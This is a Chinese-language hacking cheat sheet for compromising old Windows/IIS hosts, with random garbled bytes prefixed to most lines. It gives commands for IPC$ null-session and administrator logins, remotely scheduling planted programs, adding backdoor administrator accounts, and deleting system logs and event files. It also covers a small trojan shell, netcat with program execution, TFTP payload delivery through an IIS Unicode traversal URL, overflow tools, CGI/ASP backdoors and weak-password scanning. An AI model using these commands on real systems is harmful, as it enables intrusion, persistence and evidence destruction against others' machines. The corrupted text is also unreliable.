网管和黑客都必须知道的命令
�r=cs�i��� 常用的几条NET命令:
\y�*��j4 0 |�QY�ZRz�� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
iPU%� /_>� Dr�'sI�H^ (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
A^pW]r=Xtk %_t��k7x�� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�*( �*z|�2 3_J��>�y� (查看远程主机时间) net time \\IP地址
7zI5��PGWw *CUd�G�I&� (定时启动某个程序) at \\IP地址 02:18 readme.exe
$r"A@69^RS A7'b�Nd6f9 (查看共享) net view \\IP地址
��"��]<}Hy F"BL�#g66 (查看netbios工作组列表) nbtstat -A IP地址
6$z�'w�y/* �5+�y`P$K@ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
,I39&;Iq�� *aG�"�+c6| (这两条把自己增加到管理员组): net user 用户名 密码 /add
�l:�z���}; 6PJ'�lA;*b net localgroup Administrators 用户名 /add
���"UpOY�� 3uO�8�v{`� (断开连接) net use \\IP地址\ipc$ /delete
=~�",/I�?� V2QW�\�2@$ 扫尾:
U9F6d!:L7A wi�BuEaUkW del C:\winnt\system32\logfiles\*.*
RO$*G
jQd 5J�d�`�
^U del C:\winnt\ssytem32\config\*.evt
{r�{��>?)O EO���Q�a�Y del C:\winnt\system32\dtclog\*.*
�qz�lER�� R_9 o!s�TZ del C:\winnt\system32\*.log
"��s;ci�~$ ���.�pKN4 del C:\winnt\system32\*.txt
P��,`=]Y�* ���Cn�/�q= del C:\winnt\*.txt
`OLB'�;��D [�U'�]k��t del C:\winnt\*.log
8�5��Dm�8~ 43F�^J�%G� 一、netsvc.exe
7H?!��RYrx iW-t}}�Z>B 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
D�zE E:&*= �th9�0O|�; netsvc /list \\IP地址
'D�q"e$JM< R{ 4u|A?�9 netsvc schedule \\IP地址 /query
k�lo�^K�9! 5Ny0b|�+p� netsvc \\IP地址 schedule /start
>!<V\
Fj1 ��cY^Y!.�, 二、OpenTelnet.exe
�MKe� �*f%
J��b�6&�� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�&#%�D.�@L #-A5Z;TD. OpenTelnet \\IP地址 用户名 密码 1 7878
2t��.�f�D@ � @}P�w0vC 然后就可以telnet到主机的7878端口,进入DOS方式下:
P0A��as)�! �r"6l�Lc� telnet IP地址 7878
HN^�w'I'bp �h�N!.@�L� 三、winshell.exe
&4[<F"W>47 �`dP? 2�-Z 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
Sc�f.4~H 0 2Sv>C `FMU p Path (查看winshell主程序的路径信息)
,Qga�|�n8C <'V�A=orD b reBoot (重新启动机器)
�t<8��z08 5N�Fq7&rJ6 d shutDown (关闭机器)
&#$2;-q8�+ "ngSilH?�D s Shell (执行后你就会看到可爱的“C:\>”)
�uTxX`vH@! �ya�;@��<b x eXit (退出本次登录会话,此命令并不终止winshell的运行)
F1zT �)�wW ��0,+��EV, CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
8��U8P
g�2 }7otuO(pRo 四、3389登陆器,GUI方式登录远程主机的
:�A�,O(�
� 3{�6ps : w 五、elsave.exe
x4�/T?�4k� :LU"5�g��� 事件日志清除工具
-w���J��� 6oPU�Y��n- elsave -s \\IP地址 -l "application" -C
�&9S8al
8" NU B�pIx&� elsave -s \\IP地址 -l "system" -C
P�EK.K�t\M W`
WLW8Qsw elsave -s \\IP地址 -l "security" -C
tj`tLYOZ@- 0-�6:A�Hix 执行后成功清除应用程序日志,系统日志,安全日志
vQ?�M�M&6� y^�5��T/�M 六、hbulot.exe
|k/`WC6As. \H},�ou�U� 开启win2kserver和winxp的3389服务
g�|�_Hc�aW @2)t#~Wc4h hbulot [/r]
L{4�),65�� gK&5�H�T�o 使用/r表示安装完成后自动重起目标使设置生效。
\HB�VN�BY� r3*+8�D~a_ 七、nc.exe(netcat.exe)
�){?mKB��5 �9/@FAD��h 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
BT
y]!%r�' -6.i\
B�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
N�v�}U/$$S 5�]A$P\7~1 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�H8(0�.�IR ~N�)( ^ 4� 参数:
Vu_7uSp�,) G~b`O20N�� -e prog 程序重定向,一旦连接,就执行 [危险!!]
�:�HQ8M*�o N�>W;0u��! -g gateway source-routing hop point[s], up to 8
g]� 7��{�5 �0:7v�/S!: -G num source-routing pointer: 4, 8, 12, ...
)&b}^�1��� uOi�vnJ?� -h 帮助信息
tal>�b�]B; wR�5\^[GN -i secs 延时的间隔
yoq\9* ?u^
o��x i
a} -l 监听模式,用于入站连接
�P>yG/:�W; �VuJfo9 `E -n 指定数字的IP地址,不能用hostname
�I{*.htt�{ �op.PS{_t� -o file 记录16进制的传输
Q{ |+�3!!' �tS��_x�a� -p port 本地端口号
.P�|+oYT&g |,M#�8NOp: -r 任意指定本地及远程端口
t(�uB66(_F � 8o%<.] � -s addr 本地源地址
YG�}p$\��R U#U�Venp�@ -u UDP模式
L~�?���,�6 (�I�O�\+�� -v 详细输出——用两个-v可得到更详细的内容
MIk #60Ab Sh~ ��8jEk -w secs timeout的时间
^-c�s�i��� �(F4d�F�h -z 将输入输出关掉——用于扫描时
f//j{P��[� 八、TFTPD32.EXE
z$8�e�6�*� �U&d-�?�PI 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
b3�y,4�ke" ]`CKQ�>
�o http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
o%�N0�K��� �`0n 7Cyed 然后可以直接令文件运行:
?=|�)���n% #Kb�)>gz�T http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
<Vr�]�2m�w z��n?a|kt� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
]uk�j]m�/@ S�h�sP]$Yp 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
-�6�7�f3�3 ���HPd+Bd� 一、一 Xscan命令行运行参数说明:
yo��Q?lh�� +g���D�)Yd 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�b/D9P~cE B9;,A;�E}; 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
.@/z-Og�Xg A]~i�uUH�m xscan -file <主机列表文件名> <检测项目> [其他选项]
AIR�VvW~($ �y!�{/'{?P 其中<检测项目> 含义如下:
�L���u#�@~ m;t�Y(k��O -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
g�^�<q L�| Yf��2�+@E -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
W0uM?J\O� �MCW�G*~�f -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
_>:�=<xyOq &�oK/�]lub -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�� qzU2�H� #�����9W5� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
N-�?|]4e/� [0�,q7�d?" [其他选项] 含义如下:
l.N�kS���� �c_8���m�Q -v: 显示详细扫描进度
&0<R:K�?>N /�xm} ?t0U -p: 跳过Ping不通的主机
Iy1X��n�S* d����W=D]� -o: 跳过没有检测到开放端口的主机
z&HN�>��7� :Ro"��
0/d -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
